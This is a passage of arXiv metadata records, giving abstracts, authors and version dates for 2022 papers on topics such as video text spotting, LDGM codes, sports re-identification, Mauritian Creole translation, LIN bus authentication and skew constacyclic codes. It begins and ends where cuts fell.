text dataset captured by UAV. To reduce energy consumption, we further propose
a multi-stage image processor that takes videos' redundancy, continuity, and
mixed degradation into account. Lastly, the model is pruned and quantized
before deployed on Raspberry Pi. Our proposed energy-efficient video text
spotting solution, dubbed as E^2VTS, outperforms all previous methods by
achieving a competitive tradeoff between energy efficiency and performance. All
our codes and pre-trained models are available at
https://github.com/wuzhenyusjtu/LPCVC20-VideoTextSpotting.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 22:43:17 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hu",
"Zhenyu",
""
],
[
"Wu",
"Zhenyu",
""
],
[
"Pi",
"Pengcheng",
""
],
[
"Xue",
"Yunhe",
""
],
[
"Shen",
"Jiayi",
""
],
[
"Tan",
"Jianchao",
""
],
[
"Lian",
"Xiangru",
""
],
[
"Wang",
"Zhangyang",
""
],
[
"Liu",
"Ji",
""
]
] |
new_dataset
| 0.995971 |
2206.02314
|
Yixin Wang
|
Yixin Wang and Tingting Zhu and Xiao Ma
|
Transmission of Bernoulli Sources Using Convolutional LDGM Codes
|
24 pages, 13 figures
| null | null | null |
cs.IT math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We propose in this paper to exploit convolutional low density generator
matrix (LDGM) codes for transmission of Bernoulli sources over binary-input
output-symmetric (BIOS) channels. To this end, we present a new framework to
prove the coding theorems for linear codes, which unifies the channel coding
theorem, the source coding theorem and the joint source-channel coding (JSCC)
theorem. In the presented framework, the systematic bits and the corresponding
parity-check bits play different roles. Precisely, the noisy systematic bits
are used to limit the list size of typical codewords, while the noisy
parity-check bits are used to select from the list the maximum likelihood
codeword. This new framework for linear codes allows that the systematic bits
and the parity-check bits are transmitted in different ways and over different
channels. With this framework, we prove that the Bernoulli generator matrix
codes (BGMCs) are capacity-achieving over BIOS channels, entropy-achieving for
Bernoulli sources, and also system-capacity-achieving for JSCC applications. A
lower bound on the bit-error rate (BER) is derived for linear codes, which can
be used to predict the error floors and hence serves as a simple tool to design
the JSCC system. Numerical results show that the convolutional LDGM codes
perform well in the waterfall region and match well with the derived error
floors, which can be lowered down if required by simply increasing the encoding
memory.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 02:15:56 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Yixin",
""
],
[
"Zhu",
"Tingting",
""
],
[
"Ma",
"Xiao",
""
]
] |
new_dataset
| 0.968103 |
2206.02366
|
Alexandr Notchenko
|
Alexandr Notchenko, Vladislav Ishimtsev, Alexey Artemov, Vadim
Selyutin, Emil Bogomolov, Evgeny Burnaev
|
Scan2Part: Fine-grained and Hierarchical Part-level Understanding of
Real-World 3D Scans
|
In Proceedings of the 17th International Joint Conference on Computer
Vision, Imaging and Computer Graphics Theory and Applications
| null |
10.5220/0010848200003124
| null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We propose Scan2Part, a method to segment individual parts of objects in
real-world, noisy indoor RGB-D scans. To this end, we vary the part hierarchies
of objects in indoor scenes and explore their effect on scene understanding
models. Specifically, we use a sparse U-Net-based architecture that captures
the fine-scale detail of the underlying 3D scan geometry by leveraging a
multi-scale feature hierarchy. In order to train our method, we introduce the
Scan2Part dataset, which is the first large-scale collection providing detailed
semantic labels at the part level in the real-world setting. In total, we
provide 242,081 correspondences between 53,618 PartNet parts of 2,477 ShapeNet
objects and 1,506 ScanNet scenes, at two spatial resolutions of 2 cm$^3$ and 5
cm$^3$. As output, we are able to predict fine-grained per-object part labels,
even when the geometry is coarse or partially missing.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 05:43:10 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Notchenko",
"Alexandr",
""
],
[
"Ishimtsev",
"Vladislav",
""
],
[
"Artemov",
"Alexey",
""
],
[
"Selyutin",
"Vadim",
""
],
[
"Bogomolov",
"Emil",
""
],
[
"Burnaev",
"Evgeny",
""
]
] |
new_dataset
| 0.979616 |
2206.02373
|
Bharath Comandur
|
Bharath Comandur
|
Sports Re-ID: Improving Re-Identification Of Players In Broadcast Videos
Of Team Sports
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This work focuses on player re-identification in broadcast videos of team
sports. Specifically, we focus on identifying the same player in images
captured from different camera viewpoints during any given moment of a match.
This task differs from traditional applications of person re-id in a few
important ways. Firstly, players from the same team wear highly similar
clothes, thereby making it harder to tell them apart. Secondly, there are only
a few number of samples for each identity, which makes it harder to train a
re-id system. Thirdly, the resolutions of the images are often quite low and
vary a lot. This combined with heavy occlusions and fast movements of players
greatly increase the challenges for re-id. In this paper, we propose a simple
but effective hierarchical data sampling procedure and a centroid loss function
that, when used together, increase the mean average precision (mAP) by 7 - 11.5
and the rank-1 (R1) by 8.8 - 14.9 without any change in the network or
hyper-parameters used. Our data sampling procedure improves the similarity of
the training and test distributions, and thereby aids in creating better
estimates of the centroids of the embeddings (or feature vectors).
Surprisingly, our study shows that in the presence of severely limited data, as
is the case for our application, a simple centroid loss function based on
euclidean distances significantly outperforms the popular triplet-centroid loss
function. We show comparable improvements for both convolutional networks and
vision transformers. Our approach is among the top ranked methods in the
SoccerNet Re-Identification Challenge 2022 leaderboard (test-split) with a mAP
of 86.0 and a R1 of 81.5. On the sequestered challenge split, we achieve an mAP
of 84.9 and a R1 of 80.1. Research on re-id for sports-related applications is
very limited and our work presents one of the first discussions in the
literature on this.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 06:06:23 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Comandur",
"Bharath",
""
]
] |
new_dataset
| 0.954467 |
2206.02396
|
Vahideh Keikha
|
Vahideh Keikha
|
Large $k$-gons in a 1.5D Terrain
| null | null | null | null |
cs.CG
|
http://creativecommons.org/licenses/by/4.0/
|
Given is a 1.5D terrain $\mathcal{T}$, i.e., an $x$-monotone polygonal chain
in $\mathbb{R}^2$. For a given $2\le k\le n$, our objective is to approximate
the largest area or perimeter convex polygon of exactly or at most $k$ vertices
inside $\mathcal{T}$. For a constant $k>3$, we design an FPTAS that efficiently
approximates the largest convex polygons with at most $k$ vertices, within a
factor $(1-\epsilon)$. For the case where $k=2$, we design an $O(n)$ time exact
algorithm for computing the longest line segment in $\mathcal{T}$, and for
$k=3$, we design an $O(n \log n)$ time exact algorithm for computing the
largest-perimeter triangle that lies within $\mathcal{T}$.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 07:09:19 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Keikha",
"Vahideh",
""
]
] |
new_dataset
| 0.960584 |
2206.02421
|
Prasanna Raj Noel Dabre
|
Raj Dabre, Aneerav Sukhoo
|
MorisienMT: A Dataset for Mauritian Creole Machine Translation
|
Work in progress! (obviously) Dataset is here:
https://huggingface.co/datasets/prajdabre/MorisienMT
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we describe MorisienMT, a dataset for benchmarking machine
translation quality of Mauritian Creole. Mauritian Creole (Morisien) is the
lingua franca of the Republic of Mauritius and is a French-based creole
language. MorisienMT consists of a parallel corpus between English and
Morisien, French and Morisien and a monolingual corpus for Morisien. We first
give an overview of Morisien and then describe the steps taken to create the
corpora and, from it, the training and evaluation splits. Thereafter, we
establish a variety of baseline models using the created parallel corpora as
well as large French--English corpora for transfer learning. We release our
datasets publicly for research purposes and hope that this spurs research for
Morisien machine translation.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 08:30:03 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Dabre",
"Raj",
""
],
[
"Sukhoo",
"Aneerav",
""
]
] |
new_dataset
| 0.999749 |
2206.02562
|
Dominik Raabe
|
Dominik Raabe, Henrik Biermann, Manuel Bassek, Martin Wohlan, Rumena
Komitova, Robert Rein, Tobias Kuppens Groot, Daniel Memmert
|
floodlight -- A high-level, data-driven sports analytics framework
|
5 pages, 1 figure. For associated package, see
https://pypi.org/project/floodlight/. For source code, see
https://github.com/floodlight-sports/floodlight . For documentation, see
https://floodlight.readthedocs.io
| null | null | null |
cs.HC
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The present work introduces floodlight, an open source Python package built
to support and automate team sport data analysis. It is specifically designed
for the scientific analysis of spatiotemporal tracking data, event data, and
game codes in disciplines such as match and performance analysis, exercise
physiology, training science, and collective movement behavior analysis. It is
completely provider- and sports-independent and includes a high-level interface
suitable for programming beginners. The package includes routines for most
aspects of the data analysis process, including dedicated data classes, file
parsing functionality, public dataset APIs, pre-processing routines, common
data models and several standard analysis algorithms previously used in the
literature, as well as basic visualization functionality. The package is
intended to make team sport data analysis more accessible to sport scientists,
foster collaborations between sport and computer scientists, and strengthen the
community's culture of open science and inclusion of previous works in future
works.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 10:33:38 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Raabe",
"Dominik",
""
],
[
"Biermann",
"Henrik",
""
],
[
"Bassek",
"Manuel",
""
],
[
"Wohlan",
"Martin",
""
],
[
"Komitova",
"Rumena",
""
],
[
"Rein",
"Robert",
""
],
[
"Groot",
"Tobias Kuppens",
""
],
[
"Memmert",
"Daniel",
""
]
] |
new_dataset
| 0.987416 |
2206.02573
|
Yi Cheng
|
Yi Cheng, Fen Fang, Ying Sun
|
Team VI-I2R Technical Report on EPIC-KITCHENS-100 Unsupervised Domain
Adaptation Challenge for Action Recognition 2021
| null | null | null | null |
cs.CV cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this report, we present the technical details of our approach to the
EPIC-KITCHENS-100 Unsupervised Domain Adaptation (UDA) Challenge for Action
Recognition. The EPIC-KITCHENS-100 dataset consists of daily kitchen activities
focusing on the interaction between human hands and their surrounding objects.
It is very challenging to accurately recognize these fine-grained activities,
due to the presence of distracting objects and visually similar action classes,
especially in the unlabelled target domain. Based on an existing method for
video domain adaptation, i.e., TA3N, we propose to learn hand-centric features
by leveraging the hand bounding box information for UDA on fine-grained action
recognition. This helps reduce the distraction from background as well as
facilitate the learning of domain-invariant features. To achieve high quality
hand localization, we adopt an uncertainty-aware domain adaptation network,
i.e., MEAA, to train a domain-adaptive hand detector, which only uses very
limited hand bounding box annotations in the source domain but can generalize
well to the unlabelled target domain. Our submission achieved the 1st place in
terms of top-1 action recognition accuracy, using only RGB and optical flow
modalities as input.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 07:37:48 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheng",
"Yi",
""
],
[
"Fang",
"Fen",
""
],
[
"Sun",
"Ying",
""
]
] |
new_dataset
| 0.999663 |
2206.02602
|
Franco Oberti
|
Franco Oberti, Ernesto Sanchez, Alessandro Savino, Filippo Parisi,
Mirco Brero, and Stefano Di Carlo
|
LIN-MM: Multiplexed Message Authentication Code for Local Interconnect
Network message authentication in road vehicles
| null | null | null | null |
cs.CR
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
The automotive market is profitable for cyberattacks with the constant shift
toward interconnected vehicles. Electronic Control Units (ECUs) installed on
cars often operate in a critical and hostile environment. Hence, both carmakers
and governments have supported initiatives to mitigate risks and threats
belonging to the automotive domain. The Local Interconnect Network (LIN) is one
of the most used communication protocols in the automotive field. Today's LIN
buses have just a few light security mechanisms to assure integrity through
Message Authentication Codes (MAC). However, several limitations with strong
constraints make applying those techniques to LIN networks challenging, leaving
several vehicles still unprotected. This paper presents LIN Multiplexed MAC
(LINMM), a new approach for exploiting signal modulation to multiplex MAC data
with standard LIN communication. LINMM allows for transmitting MAC payloads,
maintaining fullback compatibility with all versions of the standard LIN
protocol.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 13:19:57 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Oberti",
"Franco",
""
],
[
"Sanchez",
"Ernesto",
""
],
[
"Savino",
"Alessandro",
""
],
[
"Parisi",
"Filippo",
""
],
[
"Brero",
"Mirco",
""
],
[
"Di Carlo",
"Stefano",
""
]
] |
new_dataset
| 0.999184 |
2206.02619
|
Illia Oleksiienko
|
Illia Oleksiienko, Paraskevi Nousi, Nikolaos Passalis, Anastasios
Tefas and Alexandros Iosifidis
|
VPIT: Real-time Embedded Single Object 3D Tracking Using Voxel Pseudo
Images
|
10 pages, 5 figures, 4 tables. This work has been submitted to the
IEEE for possible publication. Copyright may be transferred without notice,
after which this version may no longer be accessible
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we propose a novel voxel-based 3D single object tracking (3D
SOT) method called Voxel Pseudo Image Tracking (VPIT). VPIT is the first method
that uses voxel pseudo images for 3D SOT. The input point cloud is structured
by pillar-based voxelization, and the resulting pseudo image is used as an
input to a 2D-like Siamese SOT method. The pseudo image is created in the
Bird's-eye View (BEV) coordinates, and therefore the objects in it have
constant size. Thus, only the object rotation can change in the new coordinate
system and not the object scale. For this reason, we replace multi-scale search
with a multi-rotation search, where differently rotated search regions are
compared against a single target representation to predict both position and
rotation of the object. Experiments on KITTI Tracking dataset show that VPIT is
the fastest 3D SOT method and maintains competitive Success and Precision
values. Application of a SOT method in a real-world scenario meets with
limitations such as lower computational capabilities of embedded devices and a
latency-unforgiving environment, where the method is forced to skip certain
data frames if the inference speed is not high enough. We implement a real-time
evaluation protocol and show that other methods lose most of their performance
on embedded devices, while VPIT maintains its ability to track the object.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 14:02:06 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Oleksiienko",
"Illia",
""
],
[
"Nousi",
"Paraskevi",
""
],
[
"Passalis",
"Nikolaos",
""
],
[
"Tefas",
"Anastasios",
""
],
[
"Iosifidis",
"Alexandros",
""
]
] |
new_dataset
| 0.987608 |
2206.02715
|
Abhijith Punnappurath
|
Abhijith Punnappurath, Abdullah Abuolaim, Abdelrahman Abdelhamed, Alex
Levinshtein and Michael S. Brown
|
Day-to-Night Image Synthesis for Training Nighttime Neural ISPs
| null | null | null | null |
cs.CV eess.IV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Many flagship smartphone cameras now use a dedicated neural image signal
processor (ISP) to render noisy raw sensor images to the final processed
output. Training nightmode ISP networks relies on large-scale datasets of image
pairs with: (1) a noisy raw image captured with a short exposure and a high ISO
gain; and (2) a ground truth low-noise raw image captured with a long exposure
and low ISO that has been rendered through the ISP. Capturing such image pairs
is tedious and time-consuming, requiring careful setup to ensure alignment
between the image pairs. In addition, ground truth images are often prone to
motion blur due to the long exposure. To address this problem, we propose a
method that synthesizes nighttime images from daytime images. Daytime images
are easy to capture, exhibit low-noise (even on smartphone cameras) and rarely
suffer from motion blur. We outline a processing framework to convert daytime
raw images to have the appearance of realistic nighttime raw images with
different levels of noise. Our procedure allows us to easily produce aligned
noisy and clean nighttime image pairs. We show the effectiveness of our
synthesis framework by training neural ISPs for nightmode rendering.
Furthermore, we demonstrate that using our synthetic nighttime images together
with small amounts of real data (e.g., 5% to 10%) yields performance almost on
par with training exclusively on real nighttime images. Our dataset and code
are available at https://github.com/SamsungLabs/day-to-night.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:15:45 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Punnappurath",
"Abhijith",
""
],
[
"Abuolaim",
"Abdullah",
""
],
[
"Abdelhamed",
"Abdelrahman",
""
],
[
"Levinshtein",
"Alex",
""
],
[
"Brown",
"Michael S.",
""
]
] |
new_dataset
| 0.990398 |
2206.02732
|
Tarunraj Singh
|
Youngjin Kim and Tarunraj Singh
|
Energy-Time Optimal Control of Wheeled Mobile Robots
|
36 pages,6 figures, 3 appendices
|
Journal of the Franklin Institute, 2022
|
10.1016/j.jfranklin.2022.05.032
| null |
cs.RO math.OC
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
This paper focuses on the energy-time optimal control of wheeled mobile
robots undergoing point-to-point transitions in an obstacles free space. Two
interchangeable models are used to arrive at the necessary conditions for
optimality. The first formulation exploits the Hamiltonian, while the second
formulation considers the first variation of the augmented cost to derive the
necessary conditions for optimality. Jacobi elliptic functions are shown to
parameterize the closed form solutions for the states, control and costates.
Analysis of the optimal control reveal that they are constrained to lie on a
cylinder whose circular cross-section is a function of the weight penalizing
the relative costs of time and energy. The evolving optimal costates for the
second formulation are shown to lie on the intersection of two cylinders. The
optimal control for the wheeled mobile robot undergoing point-to-point motion
is also developed where the linear velocity is constrained to be
time-invariant. It is shown that the costates are constrained to lie on the
intersection of a cylinder and an extruded parabola. Numerical results for
various point-to-point maneuvers are presented to illustrate the change in the
structure of the optimal trajectories as a function of the relative location of
the terminal and initial states.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:41:32 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Kim",
"Youngjin",
""
],
[
"Singh",
"Tarunraj",
""
]
] |
new_dataset
| 0.996312 |
2206.02760
|
Khaleel Mershad
|
Omar Cheikhrouhou, Ichrak Amdouni, Khaleel Mershad, Maryem Ammi, and
Tuan Nguyen Gia
|
Blockchain for the Cybersecurity of Smart City Applications
|
65 pages, 6 figures, 37 tables
| null | null | null |
cs.CR
|
http://creativecommons.org/licenses/by/4.0/
|
Cybersecurity is an inherent characteristic that should be addressed before
the large deployment of smart city applications. Recently, Blockchain appears
as a promising technology to provide several cybersecurity aspects of smart
city applications. This paper provides a comprehensive review of the existing
blockchain-based solutions for the cybersecurity of the main smart city
applications, namely smart healthcare, smart transportation, smart agriculture,
supply chain management, smart grid, and smart homes. We describe the existing
solutions and we discuss their merits and limits. Moreover, we define the
security requirements of each smart city application and we give a mapping of
the studied solutions to these defined requirements. Additionally, future
directions are given. We believe that the present survey is a good starting
point for every researcher in the fields of cybersecurity, blockchain, and
smart cities.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 17:37:51 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheikhrouhou",
"Omar",
""
],
[
"Amdouni",
"Ichrak",
""
],
[
"Mershad",
"Khaleel",
""
],
[
"Ammi",
"Maryem",
""
],
[
"Gia",
"Tuan Nguyen",
""
]
] |
new_dataset
| 0.998103 |
1805.05121
|
Mathias Soeken
|
Mathias Soeken, Heinz Riener, Winston Haaswijk, Eleonora Testa, Bruno
Schmitt, Giulia Meuli, Fereshte Mozafari, Siang-Yun Lee, Alessandro Tempia
Calvino, Dewmini Sudara Marakkalage, Giovanni De Micheli
|
The EPFL Logic Synthesis Libraries
|
13 pages, originally accepted at Int'l Workshop on Logic & Synthesis
2018, extended for Workshop on Open-Source EDA Technology 2019
| null | null | null |
cs.LO cs.MS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present a collection of modular open source C++ libraries for the
development of logic synthesis applications. These libraries can be used to
develop applications for the design of classical and emerging technologies, as
well as for the implementation of quantum compilers. All libraries are well
documented and well tested. Furthermore, being header-only, the libraries can
be readily used as core components in complex logic synthesis systems.
|
[
{
"version": "v1",
"created": "Mon, 14 May 2018 11:34:47 GMT"
},
{
"version": "v2",
"created": "Wed, 6 Nov 2019 14:02:30 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 09:33:52 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Soeken",
"Mathias",
""
],
[
"Riener",
"Heinz",
""
],
[
"Haaswijk",
"Winston",
""
],
[
"Testa",
"Eleonora",
""
],
[
"Schmitt",
"Bruno",
""
],
[
"Meuli",
"Giulia",
""
],
[
"Mozafari",
"Fereshte",
""
],
[
"Lee",
"Siang-Yun",
""
],
[
"Calvino",
"Alessandro Tempia",
""
],
[
"Marakkalage",
"Dewmini Sudara",
""
],
[
"De Micheli",
"Giovanni",
""
]
] |
new_dataset
| 0.999821 |
2108.12285
|
Rob Scharff
|
Sander C. van den Berg, Rob B.N. Scharff, Zolt\'an Rus\'ak, and Jun Wu
|
OpenFish: Biomimetic Design of a Soft Robotic Fish for High Speed
Locomotion
| null |
HardwareX, 2022, e00320, ISSN 2468-0672,
(https://www.sciencedirect.com/science/article/pii/S2468067222000657)
|
10.1016/j.ohx.2022.e00320
| null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present OpenFish: an open source soft robotic fish which is optimized for
speed and efficiency. The soft robotic fish uses a combination of an active and
passive tail segment to accurately mimic the thunniform swimming mode. Through
the implementation of a novel propulsion system that is capable of achieving
higher oscillation frequencies with a more sinusoidal waveform, the open source
soft robotic fish achieves a top speed of $0.85~\mathrm{m/s}$. Hereby, it
outperforms the previously reported fastest soft robotic fish by $27\%$.
Besides the propulsion system, the optimization of the fish morphology played a
crucial role in achieving this speed. In this work, a detailed description of
the design, construction and customization of the soft robotic fish is
presented. Hereby, we hope this open source design will accelerate future
research and developments in soft robotic fish.
|
[
{
"version": "v1",
"created": "Tue, 20 Jul 2021 08:38:08 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 12:48:12 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Berg",
"Sander C. van den",
""
],
[
"Scharff",
"Rob B. N.",
""
],
[
"Rusák",
"Zoltán",
""
],
[
"Wu",
"Jun",
""
]
] |
new_dataset
| 0.998022 |
2109.13410
|
Yiyi Liao
|
Yiyi Liao, Jun Xie, Andreas Geiger
|
KITTI-360: A Novel Dataset and Benchmarks for Urban Scene Understanding
in 2D and 3D
|
arXiv admin note: text overlap with arXiv:1511.03240
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
For the last few decades, several major subfields of artificial intelligence
including computer vision, graphics, and robotics have progressed largely
independently from each other. Recently, however, the community has realized
that progress towards robust intelligent systems such as self-driving cars
requires a concerted effort across the different fields. This motivated us to
develop KITTI-360, successor of the popular KITTI dataset. KITTI-360 is a
suburban driving dataset which comprises richer input modalities, comprehensive
semantic instance annotations and accurate localization to facilitate research
at the intersection of vision, graphics and robotics. For efficient annotation,
we created a tool to label 3D scenes with bounding primitives and developed a
model that transfers this information into the 2D image domain, resulting in
over 150k images and 1B 3D points with coherent semantic instance annotations
across 2D and 3D. Moreover, we established benchmarks and baselines for several
tasks relevant to mobile perception, encompassing problems from computer
vision, graphics, and robotics on the same dataset, e.g., semantic scene
understanding, novel view synthesis and semantic SLAM. KITTI-360 will enable
progress at the intersection of these research areas and thus contribute
towards solving one of today's grand challenges: the development of fully
autonomous self-driving systems.
|
[
{
"version": "v1",
"created": "Tue, 28 Sep 2021 00:41:29 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 07:09:53 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liao",
"Yiyi",
""
],
[
"Xie",
"Jun",
""
],
[
"Geiger",
"Andreas",
""
]
] |
new_dataset
| 0.999854 |
2112.01085
|
Ziao Yang
|
Ziao Yang, Xiangrui Yang and Qifeng Lin
|
PTCT: Patches with 3D-Temporal Convolutional Transformer Network for
Precipitation Nowcasting
|
9 pages, 3 figures
| null | null | null |
cs.CV cs.MM
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Precipitation nowcasting is to predict the future rainfall intensity over a
short period of time, which mainly relies on the prediction of radar echo
sequences. Though convolutional neural network (CNN) and recurrent neural
network (RNN) are widely used to generate radar echo frames, they suffer from
inductive bias (i.e., translation invariance and locality) and seriality,
respectively. Recently, Transformer-based methods also gain much attention due
to the great potential of Transformer structure, whereas short-term
dependencies and autoregressive characteristic are ignored. In this paper, we
propose a variant of Transformer named patches with 3D-temporal convolutional
Transformer network (PTCT), where original frames are split into multiple
patches to remove the constraint of inductive bias and 3D-temporal convolution
is employed to capture short-term dependencies efficiently. After training, the
inference of PTCT is performed in an autoregressive way to ensure the quality
of generated radar echo frames. To validate our algorithm, we conduct
experiments on two radar echo dataset: Radar Echo Guangzhou and HKO-7. The
experimental results show that PTCT achieves state-of-the-art (SOTA)
performance compared with existing methods.
|
[
{
"version": "v1",
"created": "Thu, 2 Dec 2021 10:05:01 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 04:50:30 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Yang",
"Ziao",
""
],
[
"Yang",
"Xiangrui",
""
],
[
"Lin",
"Qifeng",
""
]
] |
new_dataset
| 0.99652 |
2203.03405
|
Valentina Musat
|
Valentina Musat, Daniele De Martini, Matthew Gadd and Paul Newman
|
Depth-SIMS: Semi-Parametric Image and Depth Synthesis
| null | null | null | null |
cs.CV cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this paper we present a compositing image synthesis method that generates
RGB canvases with well aligned segmentation maps and sparse depth maps, coupled
with an in-painting network that transforms the RGB canvases into high quality
RGB images and the sparse depth maps into pixel-wise dense depth maps. We
benchmark our method in terms of structural alignment and image quality,
showing an increase in mIoU over SOTA by 3.7 percentage points and a highly
competitive FID. Furthermore, we analyse the quality of the generated data as
training data for semantic segmentation and depth completion, and show that our
approach is more suited for this purpose than other methods.
|
[
{
"version": "v1",
"created": "Mon, 7 Mar 2022 13:58:32 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 20:28:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Musat",
"Valentina",
""
],
[
"De Martini",
"Daniele",
""
],
[
"Gadd",
"Matthew",
""
],
[
"Newman",
"Paul",
""
]
] |
new_dataset
| 0.998985 |
2204.08129
|
Xun Long Ng
|
Xun Long Ng, Kian Eng Ong, Qichen Zheng, Yun Ni, Si Yong Yeo, Jun Liu
|
Animal Kingdom: A Large and Diverse Dataset for Animal Behavior
Understanding
|
Accepted by CVPR2022 (Oral). Dataset:
https://sutdcv.github.io/Animal-Kingdom
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Understanding animals' behaviors is significant for a wide range of
applications. However, existing animal behavior datasets have limitations in
multiple aspects, including limited numbers of animal classes, data samples and
provided tasks, and also limited variations in environmental conditions and
viewpoints. To address these limitations, we create a large and diverse
dataset, Animal Kingdom, that provides multiple annotated tasks to enable a
more thorough understanding of natural animal behaviors. The wild animal
footages used in our dataset record different times of the day in extensive
range of environments containing variations in backgrounds, viewpoints,
illumination and weather conditions. More specifically, our dataset contains 50
hours of annotated videos to localize relevant animal behavior segments in long
videos for the video grounding task, 30K video sequences for the fine-grained
multi-label action recognition task, and 33K frames for the pose estimation
task, which correspond to a diverse range of animals with 850 species across 6
major animal classes. Such a challenging and comprehensive dataset shall be
able to facilitate the community to develop, adapt, and evaluate various types
of advanced methods for animal behavior analysis. Moreover, we propose a
Collaborative Action Recognition (CARe) model that learns general and specific
features for action recognition with unseen new animals. This method achieves
promising performance in our experiments. Our dataset can be found at
https://sutdcv.github.io/Animal-Kingdom.
|
[
{
"version": "v1",
"created": "Mon, 18 Apr 2022 02:05:15 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 14:00:22 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Ng",
"Xun Long",
""
],
[
"Ong",
"Kian Eng",
""
],
[
"Zheng",
"Qichen",
""
],
[
"Ni",
"Yun",
""
],
[
"Yeo",
"Si Yong",
""
],
[
"Liu",
"Jun",
""
]
] |
new_dataset
| 0.999799 |
2204.14026
|
Ignacio Fernandez-Hernandez
|
Ignacio Fernandez-Hernandez, Simon Cancela, Rafael Terris-Gallego,
Gonzalo Seco-Granados, Jos\'e A. L\'opez-Salcedo, C. O'Driscoll, J. Winkel,
A. dalla Chiara, C. Sarto, Vincent Rijmen, Daniel Blonski, Javier de Blas
|
Semi-Assisted Signal Authentication based on Galileo ACAS
| null | null | null | null |
cs.CR eess.SP
|
http://creativecommons.org/licenses/by/4.0/
|
A GNSS signal authentication concept named semi-assisted authentication is
proposed. It is based on the re-encryption and publication of keystream
sequences of some milliseconds from an already existing encrypted signal. Some
seconds after the keystreams are transmitted in the signal-in-space, the signal
broadcasts the key allowing to decrypt the sequences and the a-posteriori
correlation at the receiver. The concept is particularized as Galileo Assisted
Commercial Authentication Service, or ACAS, for Galileo E1-B, with OSNMA used
for the decryption keys, and E6C, assumed to be encrypted in the near future.
This work proposes the ACAS cryptographic operations and a model for signal
processing and authentication verification. Semi-assisted authentication can be
provided without any modification to the signal plan of an existing GNSS,
without the disclosure of signal encryption keys, and for several days of
receiver autonomy, depending on its storage capabilities.
|
[
{
"version": "v1",
"created": "Fri, 29 Apr 2022 11:52:20 GMT"
},
{
"version": "v2",
"created": "Mon, 2 May 2022 07:45:45 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 10:31:56 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Fernandez-Hernandez",
"Ignacio",
""
],
[
"Cancela",
"Simon",
""
],
[
"Terris-Gallego",
"Rafael",
""
],
[
"Seco-Granados",
"Gonzalo",
""
],
[
"López-Salcedo",
"José A.",
""
],
[
"O'Driscoll",
"C.",
""
],
[
"Winkel",
"J.",
""
],
[
"Chiara",
"A. dalla",
""
],
[
"Sarto",
"C.",
""
],
[
"Rijmen",
"Vincent",
""
],
[
"Blonski",
"Daniel",
""
],
[
"de Blas",
"Javier",
""
]
] |
new_dataset
| 0.998585 |
2205.08964
|
Ying Zhao
|
Ying Zhao
|
Skew constacyclic codes over a class of finite commutative semisimple
rings
| null | null | null | null |
cs.IT math.IT math.RA
|
http://creativecommons.org/licenses/by/4.0/
|
In this article, we study skew constacyclic codes over a class of finite
commutative semisimple rings. The automorphism group of
$\mathcal{R}=\prod_{i=1}^t F_q$ is determined, and we characterize skew
constacyclic codes over ring by linear codes over finite field. We also define
homomorphisms which map linear codes over $\mathcal{R}$ to matrix product codes
over $F_q,$ some optimal linear codes over finite fields are obtained.
|
[
{
"version": "v1",
